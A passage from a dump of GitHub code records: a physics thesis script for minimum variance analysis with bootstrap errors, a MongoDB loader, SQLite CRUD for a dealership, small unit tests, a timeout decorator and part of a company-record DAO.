r'C:\\Users\\sofia\\Documents\\Facultad\\Tesis\\Ejercicio MVA cap8/'\n#t_mag, B_x, B_y, B_z, v_x, v_y, v_z, N = np.loadtxt(path+'datos.txt', skiprows = 1, unpack = True)\n#B_vec = np.array([B_x, B_y, B_z]).T\n# \n##unidades: T(s), B(nT), v(km/s), N(particles/cm^3)\n\n#%%----------------------------------- FUNCIONES GENERALES -------------------------------------------\n\n\n#elementos matriz de covarianza \ndef cov(x):\n A = np.empty([3,3])\n for i in range(3):\n for j in range(3):\n A[i,j] = np.mean(x[:,i]*x[:,j]) - np.mean(x[:,i])*np.mean(x[:,j])\n return A\n\n\n\n\n#reordenamiento de autovalores y autovectores (autovalores de mayor a menor)\ndef ordered(a, u):\n #autovectores ordenados de menor a mayor (provisorio)\n orden = np.argsort(a) #indices de elementos de a de menor a mayor\n w = [u[:,0], u[:,1], u[:,2]]\n w = np.array([w[i] for i in orden]).T\n #de mayor a menor\n x = np.array([w[:,2], w[:,1], w[:,0]]).T\n l= sorted(a, key = float, reverse = True)\n return(l, x)\n\n\n\n\n#errores autovectores (err_v[i,j] es el angulo de rot del autovector i respecto del autovector j) \ndef err_vec(m, l):\n err_v = np.empty([3,3])\n for i in range(3):\n for j in range(3):\n if i != j:\n err_v[i,j] = np.sqrt(l[2]/(m-1) * (l[i]+l[j]-l[2])/(l[i]-l[j])**2)\n if err_v[i,j] > np.pi : err_v[i,j] = abs(2*np.pi - err_v[i,j])\n else:\n err_v[i,j] = 0.0 #pongo esto porque la formula del error vale solo para i disntito de j\n return err_v\n\n\n\n\n#error estadistico de la componente normal del campo B (ie, error de )\ndef err_B(l_3, m, err_v32, err_v31, x, B):\n err_B3 = np.sqrt(l_3/(m-1) + (err_v32 * np.dot(B,x[1,:]))**2 + (err_v31 * np.dot(B,x[0,:]))**2)\n return err_B3\n\n\n\n\n#metodo bootstrap\ndef boot(B, Ns):\n \n norm = np.empty([Ns,3])\n b_mean = 
np.empty([Ns,3])\n E = np.empty([Ns,5]) #col de E: err_13 / err_13_grad / err_23 / err_23_grad / err_B3\n \n \n C = list(B)\n \n for i in range(Ns):\n \n b = [random.choice(C) for _ in range(len(C))]\n b = np.array(b)\n \n b_mean[i,:] = np.mean(b, axis = 0).T\n \n \n # HAGO MVA AL BOOTSTRAP SAMPLE:\n \n m = cov(b)\n q, z = np.linalg.eig(m) #cada columna de u es un autovector distinto (componentes en cada fila)\n #de mayor a menor:\n q, z = ordered(q, z)\n \n #fuerzo normal externa\n if z[0,2] < 0: z[:,2] = - z[:,2]\n \n #armo terna con los autovectores respetando x3 normal exterior\n w = np.array([z[:,0], np.cross(z[:,2],z[:,0]), z[:,2]]) #cada fila es un autovector distinto\n \n# w = np.array([z[:,0], z[:,1], z[:,2]]) # vectores asi como salen (para test)\n \n #renombro todo para no tener mil variables.\n norm[i,:] = w[2,:]\n \n #errores\n err_w = err_vec(len(b[:,0]), q) #en radianes\n err_w_grad = err_w*180/(np.pi) #en grados\n err_bw3 = err_B(q[2], len(b[:,0]), err_w[2,1], err_w[2,0], w, np.mean(b, axis = 0))\n \n E[i,0] = err_w[0,2]\n E[i,1] = err_w_grad[0,2]\n E[i,2] = err_w[1,2]\n E[i,3] = err_w_grad[1,2]\n E[i,4] = err_bw3\n \n return E, norm, b_mean\n\n\n#%%################################################################################################################\n###################################################################################################################\n###################################################################################################################\n###################################################################################################################\n#%%------------------------------ MATRIZ DE COV: AUTOVALORES Y AUTOVECTORES --------------------------------------\n\n\nM = cov(B_vec)\na, u = np.linalg.eig(M) #cada columna de u es un autovector distinto (componentes en cada fila)\n#de mayor a menor:\nl, y = ordered(a, u)\n\n#fuerzo normal externa (componente en x_MSO positiva)\nif y[0,2] < 0: y[:,2] = - y[:,2] \n\n#como M es simetrica, los autovectores son ortonormales\n#pero pueden formar una terna no necesariamente en el orden (x1,x2,x3)\n#lo fuerzo respetando que x3 sea normal externa\nx = np.array([y[:,0], np.cross(y[:,2],y[:,0]), y[:,2]]) #cada fila es un autovector distinto\n\n#x = np.array([y[:,0], y[:,1], y[:,2]]) #como salen de la matriz\n\n##corrijo signos para el ejemplo\n#sgn = np.array([-1,-1])\n#x = np.array([sgn[0]*y[:,0], sgn[1]*np.cross(y[:,2],y[:,0]), y[:,2]])\n\n\n# componentes del campo magnetico a lo largo de cada autovector\nB1 = np.empty(len(B_vec[:,0]))\nB2 = np.empty(len(B_vec[:,0]))\nB3 = np.empty(len(B_vec[:,0]))\n\nfor m in range(len(B_vec[:,0])):\n B1[m] = np.dot(B_vec[m,:], x[0,:])\n B2[m] = np.dot(B_vec[m,:], x[1,:])\n B3[m] = np.dot(B_vec[m,:], x[2,:])\n \n\n#angulo con Bu\nthetaMVA = fcop.alpha(Bu,x[2,:])\n\n#\nav_Bx3 = np.mean(B_vec, axis = 0)\n \n\n# errores \n\nm = len(B_vec[:,0])\n\n#errores de los autovectores (la componente ij es la rotacion del autovector i respecto del j)\nerr_x = err_vec(m, l) #en radianes\nerr_x_grad = err_x*180/(np.pi) #en grados\n\n#máximo cono de error para la normal\ncono_err_x3 = max(err_x_grad[2,0],err_x_grad[2,1])\n\n\n#error (en unidades de campo magnetico)\nerr_Bx3 = err_B(l[2], m, err_x[2,1], err_x[2,0], x, av_Bx3)\n\n\n#%% ESTUDIO Bn\n\nif MODO_mva == 1:\n \n fignum = 0\n figsize = (30,15)\n font_title = 30\n font_label = 30\n font_leg = 26\n lw = 1\n colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n ticks_l = 6\n ticks_w = 3\n 
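The `cov` helper defined near the top of this `MVA.py` record builds the population covariance matrix element by element as E[x_i x_j] - E[x_i] E[x_j]; that is exactly what a single `np.cov` call gives. A quick equivalence check on random data:

import numpy as np

B = np.random.rand(200, 3)                    # rows are samples
M_numpy = np.cov(B, rowvar=False, bias=True)  # bias=True -> divide by m
M_loops = np.array([[np.mean(B[:, i] * B[:, j])
                     - np.mean(B[:, i]) * np.mean(B[:, j])
                     for j in range(3)]
                    for i in range(3)])
assert np.allclose(M_numpy, M_loops)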
grid_alpha = 0.8\n \n \n plt.figure(fignum, figsize = figsize)\n plt.suptitle(r'Componente normal del campo magnético - MVA', fontsize = font_title)\n plt.plot(t_mag, B3, linewidth = lw, color = colors[0])\n plt.axhline(y = 0, linewidth = lw, linestyle = 'dotted', color = colors[9])\n plt.ylabel(r'$B_n$ [nT]', fontsize = font_label)\n plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n plt.grid(which = 'both', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n \n plt.savefig(path_analisis+'Bn_mva{}'.format(shock_date))\n plt.savefig(path_analisis+'Bn_mva{}.pdf'.format(shock_date))\n\n\n#%% HODOGRAMAS\n\nif MODO_mva == 1:\n \n fignum = 0\n figsize = (20,15)\n font_title = 30\n font_label = 30\n font_leg = 26\n lw = 1\n msize = 15\n colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n ticks_l = 6\n ticks_w = 3\n xtick_spacing = 10\n ytick_spacing = 10\n grid_alpha = 0.8\n \n \n f, (g1, g2) = plt.subplots(1,2, figsize = figsize)\n plt.subplots_adjust(top=0.92, bottom=0.10, left=0.10, right=0.95, hspace=0.25, wspace=0.35)\n \n \n g1.plot(B2, B1, linewidth = lw)\n g1.plot(B2[0], B1[0], 'go', ms = msize, label = r'$t_i$')\n g1.plot(B2[-1], B1[-1], 'gX', ms = msize, label = r'$t_f$')\n g1.axvline(x=0, linewidth = lw, color = 'k')\n g1.axhline(y=0, linewidth = lw, color = 'k')\n g1.set_xlabel(r'$\\vec{B} \\cdot \\vec{x}_2$', size = font_label)\n g1.set_ylabel(r'$\\vec{B} \\cdot \\vec{x}_1$', size = font_label)\n g1.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n g1.xaxis.set_major_locator(ticker.MultipleLocator(xtick_spacing))\n g1.yaxis.set_major_locator(ticker.MultipleLocator(ytick_spacing))\n g1.legend(loc = 0, fontsize = font_leg)\n g1.grid(which = 'both', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n \n g2.plot(B3, B1, linewidth = lw, color = 'r')\n g2.plot(B3[0], B1[0], 'go', ms = msize, label = r'$t_i$')\n g2.plot(B3[-1], B1[-1], 'gX', ms = msize, label = r'$t_f$')\n g2.axvline(x=0, linewidth = lw, color = 'k')\n g2.axhline(y=0, linewidth = lw, color = 'k')\n g2.set_xlabel(r'$\\vec{B} \\cdot \\vec{x}_3$', size = font_label)\n g2.set_ylabel(r'$\\vec{B} \\cdot \\vec{x}_1$', size = font_label)\n g2.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n g2.xaxis.set_major_locator(ticker.MultipleLocator(xtick_spacing))\n g2.yaxis.set_major_locator(ticker.MultipleLocator(ytick_spacing))\n g2.legend(loc = 0, fontsize = font_leg)\n g2.grid(which = 'both', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n \n \n plt.savefig(path_analisis+'hodogramas_mva{}'.format(shock_date))\n plt.savefig(path_analisis+'hodogramas_mva{}.pdf'.format(shock_date))\n \n\n#%%################################################################################################################\n###################################################################################################################\n###################################################################################################################\n###################################################################################################################\n#%%------------------------------ METODO BOOTSTRAP --------------------------------------\n\nE, x3, b_medio = boot(B_vec,1000)\n\nb3 = np.empty(len(x3))\nfor i in range(len(x3)):\n b3[i] = np.dot(b_medio[i,:],x3[i,:])\n\n\n\n# promedios bootstrap y 
desviaciones estandar\n \nb3_av = np.array([np.mean(b3), st.stdev(b3)])\nerr13_av = np.array([np.mean(E[:,0]), st.stdev(E[:,0])])\nerr23_av = np.array([np.mean(E[:,2]), st.stdev(E[:,2])])\n\n#normal calculada como el promedio componente a componente normalizado\nnormal_boot = np.array([np.mean(x3[:,0]), np.mean(x3[:,1]), np.mean(x3[:,2])])/(np.linalg.norm(np.array([np.mean(x3[:,0]), np.mean(x3[:,1]), np.mean(x3[:,2])])))\n\n\n# histogramas bootstrap\n\nhist_b3, bin_b3 = np.histogram(b3, np.linspace(-6,9,100))\nhist_err13, bin_err13 = np.histogram(E[:,0], np.linspace(-0.5,0.5,50))\nhist_err23, bin_err23 = np.histogram(E[:,2], np.linspace(-0.3,0.3,50))\n\n\n\n\n\n\n\n\n", "repo_name": "sofiaburne/Tesis", "sub_path": "MVA.py", "file_name": "MVA.py", "file_ext": "py", "file_size_in_byte": 10582, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "delimitacionshock.Bx", "line_number": 18, "usage_type": "name"}, {"api_name": "delimitacionshock.By", "line_number": 18, "usage_type": "name"}, {"api_name": "delimitacionshock.Bz", "line_number": 18, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 20, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 88, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.empty", 
"line_number": 163, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 168, "usage_type": "call"}, {"api_name": "coplanaridad_funciones.alpha", "line_number": 172, "usage_type": "call"}, {"api_name": "delimitacionshock.Bu", "line_number": 172, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 184, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 212, "usage_type": "call"}, {"api_name": "delimitacionshock.t_mag", "line_number": 212, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 218, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 219, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 241, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 267, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 272, "usage_type": "argument"}, {"api_name": 
"matplotlib.pyplot.savefig", "line_number": 273, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 273, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 273, "usage_type": "argument"}, {"api_name": "numpy.empty", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 293, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 294, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 297, "usage_type": "attribute"}, {"api_name": "numpy.histogram", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 304, "usage_type": "call"}]} +{"seq_id": "12280789852", "text": "import pymongo\nimport json\n\n# Load JSON data\nwith open('courses.json', 'r') as f:\n data = json.load(f)\n\n# Connect to MongoDB\nclient = pymongo.MongoClient('localhost', 27017)\ndb = client['mydatabase']\ncollection = db['courses']\n\n# Create index\ncollection.create_index([('name', pymongo.ASCENDING)])\n\n# Insert data\nresult = collection.insert_many(data)\n\n# Print result\nprint(f\"{len(result.inserted_ids)} documents inserted.\")", "repo_name": "iamcvarma/KIMO-FastAPI-app", "sub_path": "data_loader.py", "file_name": "data_loader.py", "file_ext": "py", "file_size_in_byte": 426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 6, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}, {"api_name": "pymongo.ASCENDING", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "5115657255", "text": "import sqlite3 as lite\n\n# Fazendo o CRUD\n\n# Criando a conexão\nconnection = lite.connect('dados.db')\n\n\n# Criando informações de clientes\ndef create_clients_info(clients_info_list):\n with connection:\n cursor_create_clients = connection.cursor()\n query_create_clients = \"INSERT INTO clientes (nome, CPF, email, telefone, endereço) VALUES (?, ?, ?, ?, ?)\"\n cursor_create_clients.execute(query_create_clients, clients_info_list)\n\n\n# Acessando informações de clientes\ndef show_clients_info():\n clients_list = []\n with connection:\n cursor_read_clients = connection.cursor()\n query_read_clients = \"SELECT * FROM clientes\"\n cursor_read_clients.execute(query_read_clients)\n info = cursor_read_clients.fetchall()\n\n for i in info:\n clients_list.append(i)\n return 
clients_list\n\n\n# Updating client information\ndef update_clients_info(clients_update_list):\n with connection:\n cursor_update_clients = connection.cursor()\n query_update_clients = \"UPDATE clientes SET nome=?, email=?, telefone=?, endereço=? WHERE cpf=?\"\n cursor_update_clients.execute(query_update_clients, clients_update_list)\n\n\n# Deleting clients\ndef delete_clients_info(clients_delete_list):\n with connection:\n cursor_delete_clients = connection.cursor()\n query_delete_clients = \"DELETE FROM clientes WHERE cpf=?\"\n cursor_delete_clients.execute(query_delete_clients, clients_delete_list)\n\n\n####################################################################################################\n\n# Creating motorcycle information\ndef create_motorcycle_info(motorcycle_info_list):\n with connection:\n cursor_create_motorcycle = connection.cursor()\n query_create_motorcycle = \"INSERT INTO motocicletas (numero_de_identificaçao, preço, modelo, estado_da\" \\\n \"_motocicleta) VALUES (?, ?, ?, ?)\"\n cursor_create_motorcycle.execute(query_create_motorcycle, motorcycle_info_list)\n\n\n# Accessing motorcycle information\ndef show_motorcycle_info():\n motorcycle_list = []\n with connection:\n cursor_read_motorcycle = connection.cursor()\n query_read_motorcycle = \"SELECT * FROM motocicletas\"\n cursor_read_motorcycle.execute(query_read_motorcycle)\n info = cursor_read_motorcycle.fetchall()\n\n for i in info:\n motorcycle_list.append(i)\n return motorcycle_list\n\n\n# Updating motorcycle information\ndef update_motorcycle_info(motorcycle_update_list):\n with connection:\n cursor_update_motorcycle = connection.cursor()\n query_update_motorcycle = \"UPDATE motocicletas SET preço=?, modelo=?, estado_da_motocicleta=? WHERE numero_de\" \\\n \"_identificaçao=?\"\n cursor_update_motorcycle.execute(query_update_motorcycle, motorcycle_update_list)\n\n\n# Deleting motorcycles\ndef delete_motorcycle_info(motorcycle_delete_list):\n with connection:\n cursor_delete_motorcycle = connection.cursor()\n query_delete_motorcycle = \"DELETE FROM motocicletas WHERE numero_de_identificaçao=?\"\n cursor_delete_motorcycle.execute(query_delete_motorcycle, motorcycle_delete_list)\n", "repo_name": "PhellipeLisboa/Sistema-concessionaria", "sub_path": "view.py", "file_name": "view.py", "file_ext": "py", "file_size_in_byte": 3241, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "37769330535", "text": "import numpy as np\nimport unittest\n\nfrom data import getMode\n\n\nclass Tests(unittest.TestCase):\n def testGetModeSimple(self):\n oneHotEmotions = np.array([[1, 0], [0, 1]])\n\n classifierPred = [[1, 0]]\n predictions = np.array([classifierPred])\n\n mode = getMode(predictions, oneHotEmotions)\n self.assertTrue(np.array_equal(mode, classifierPred))\n\n def testGetModeComplex(self):\n oneHotEmotions = np.array([[1, 0], [0, 1]])\n\n pred1 = [[1, 0], [1, 0], [0, 1]]\n pred2 = [[1, 0], [0, 1], [0, 1]]\n pred3 = [[1, 0], [0, 1], [1, 0]]\n predictions = np.array([pred1, pred2, pred3])\n\n expected = [[1, 0], [0, 1], [0, 1]]\n\n mode = getMode(predictions, oneHotEmotions)\n self.assertTrue(np.array_equal(mode, expected))\n", "repo_name": "bonaert/mini-memoire", "sub_path": "src/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
"github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "data.getMode", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "data.getMode", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "18149145724", "text": "from functools import wraps\nimport signal\n\n__all__ = ['timeout']\n\n\nclass TimeoutError(Exception):\n \"\"\" A simple Exception based class as to allow users to catch timeout\n exceptions \"\"\"\n pass\n\n\ndef timeout(seconds):\n \"\"\" A decorator to provide timeouts of a function.\n\n Usage:\n @timeout(10)\n def foo():\n ....\n\n \"\"\"\n def decorator(func):\n \"\"\" Decorator method, wrapping the specified func \"\"\"\n def cb_sigalrm(signum, frame):\n \"\"\" signal callback handler, should always raise TimeoutError \"\"\"\n raise TimeoutError()\n\n def wrapper(*args, **kwargs):\n \"\"\" Actual timeout implementation, sets and unsets the alarm as\n needed \"\"\"\n orig_handler = signal.signal(signal.SIGALRM, cb_sigalrm)\n signal.alarm(seconds)\n try:\n result = func(*args, **kwargs)\n finally:\n signal.alarm(0)\n signal.signal(signal.SIGALRM, orig_handler)\n return result\n\n return wraps(func)(wrapper)\n\n return decorator\n", "repo_name": "CyberGrandChallenge/network-appliance", "sub_path": "tests/timeout.py", "file_name": "timeout.py", "file_ext": "py", "file_size_in_byte": 1093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "41", "api": [{"api_name": "signal.signal", "line_number": 31, "usage_type": "call"}, {"api_name": "signal.SIGALRM", "line_number": 31, "usage_type": "attribute"}, {"api_name": "signal.alarm", "line_number": 32, "usage_type": "call"}, {"api_name": "signal.alarm", "line_number": 36, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 37, "usage_type": "call"}, {"api_name": "signal.SIGALRM", "line_number": 37, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "40738735638", "text": "# coding: utf-8\n\"\"\"\nFecha de creacion 3/25/19\n@autor: mjapon\n\"\"\"\nimport copy\nimport logging\n\nfrom fusayal.logica.auditorias.taudit_dao import TAuditDao\nfrom fusayal.logica.contribuyente.contribuyente_dao import TContribuyenteDao\nfrom fusayal.logica.dao.base import BaseDao\nfrom fusayal.logica.empresa.empresa_model import TEmpresa\nfrom fusayal.logica.excepciones.validacion import ErrorValidacionExc\nfrom fusayal.logica.utils import enums, checkcambioutil\nfrom fusayal.utils import fechas, cadenas\n\nlog = logging.getLogger(__name__)\n\n\nclass TEmpresaDao(BaseDao):\n\n def get(self):\n sql = \"\"\"select emp_id, emp_ruc, emp_razonsocial, emp_nombrecomercial, \n emp_nroautorizacion, emp_fechaautorizacion from tempresa\"\"\"\n\n return self.first(sql=sql, tupla_desc=('emp_id', 'emp_ruc',\n 'emp_razonsocial', 'emp_nombrecomercial',\n 'emp_nroautorizacion', 'emp_fechaautorizacion'))\n\n def update(self, emp_codigo, form, user_edit):\n tempresa = self.dbsession.query(TEmpresa).filter(TEmpresa.emp_id == 
emp_codigo).first()\n\n if not cadenas.es_nonulo_novacio(form['emp_ruc']):\n raise ErrorValidacionExc(u\"Debe ingresar el ruc\")\n\n resvalid = TContribuyenteDao.verificar(form['emp_ruc'])\n if not resvalid:\n raise ErrorValidacionExc(u\"El número de ruc ingresado es incorrecto\")\n\n if not cadenas.es_nonulo_novacio(form['emp_razonsocial']):\n raise ErrorValidacionExc(u\"Debe ingresar la razon social\")\n\n # if not cadenas.es_nonulo_novacio(form['emp_nroautorizacion']):\n # raise ErrorValidacionExc(u\"Debe ingresar el número de autorización\")\n\n if not cadenas.es_nonulo_novacio(form['emp_fechaautorizacion']):\n raise ErrorValidacionExc(u\"Debe ingresar la fecha de autorización\")\n\n tempresa_cloned = copy.copy(tempresa)\n\n if tempresa is not None:\n tempresa.emp_ruc = form.get(\"emp_ruc\")\n tempresa.emp_razonsocial = form.get(\"emp_razonsocial\")\n tempresa.emp_nombrecomercial = form.get(\"emp_nombrecomercial\")\n tempresa.emp_fechaautorizacion = fechas.parse_cadena(form.get(\"emp_fechaautorizacion\"))\n # tempresa.emp_nroautorizacion = form.get(\"emp_nroautorizacion\")\n\n tauditdao = TAuditDao(self.dbsession)\n list_cambios = checkcambioutil.valor_cambiado(tempresa_cloned.__json__(), form)\n if list_cambios is not None and len(list_cambios) > 0:\n for row in list_cambios:\n col = row['col']\n valorant = row['valorant']\n valordesp = row['valordesp']\n tauditdao.crea_accion_update(enums.TBL_EMPRESA, col, user_edit, valorant, valordesp,\n tempresa.emp_id)\n\n def crear(self, form, user_crea):\n\n if not cadenas.es_nonulo_novacio(form['emp_ruc']):\n raise ErrorValidacionExc(u\"Debe ingresar el ruc\")\n\n # Validar que el ruc ingresado este correcto\n resvalid = TContribuyenteDao.verificar(form['emp_ruc'])\n if not resvalid:\n raise ErrorValidacionExc(u\"El número de ruc ingresado es incorrecto\")\n\n if not cadenas.es_nonulo_novacio(form['emp_razonsocial']):\n raise ErrorValidacionExc(u\"Debe ingresar la razon social\")\n\n if not cadenas.es_nonulo_novacio(form['emp_nroautorizacion']):\n raise ErrorValidacionExc(u\"Debe ingresar el número de autorización\")\n\n # Validar que el numero de autorizacion sea distinto de cero\n emp_nroautorizacion = form['emp_nroautorizacion']\n if not emp_nroautorizacion.isdigit():\n raise ErrorValidacionExc(u\"El número de autorización es incorrecto debe ser solo números\")\n elif int(emp_nroautorizacion) == 0:\n raise ErrorValidacionExc(u\"El número de autorización debe ser distinto de cero\")\n\n if not cadenas.es_nonulo_novacio(form['emp_fechaautorizacion']):\n raise ErrorValidacionExc(u\"Debe ingresar la fecha de autorización\")\n else:\n # Validar que no sean fechas posteriores a la fecha actual\n if not fechas.isvalid(form['emp_fechaautorizacion']):\n raise ErrorValidacionExc(\n \"La fecha de autorización ingresada es incorrecta verifique que se encuentre en el formato dd/mm/aaaa\")\n\n fecha_actual = fechas.get_str_fecha_actual()\n\n if not fechas.es_fecha_a_mayor_fecha_b(form['emp_fechaautorizacion'], fecha_actual):\n raise ErrorValidacionExc(u\"La fecha de autorización no puede estar despues de la fecha de actual\")\n\n tempresa = TEmpresa()\n tempresa.emp_ruc = form.get(\"emp_ruc\")\n tempresa.emp_razonsocial = form.get(\"emp_razonsocial\")\n tempresa.emp_nombrecomercial = form.get(\"emp_nombrecomercial\")\n 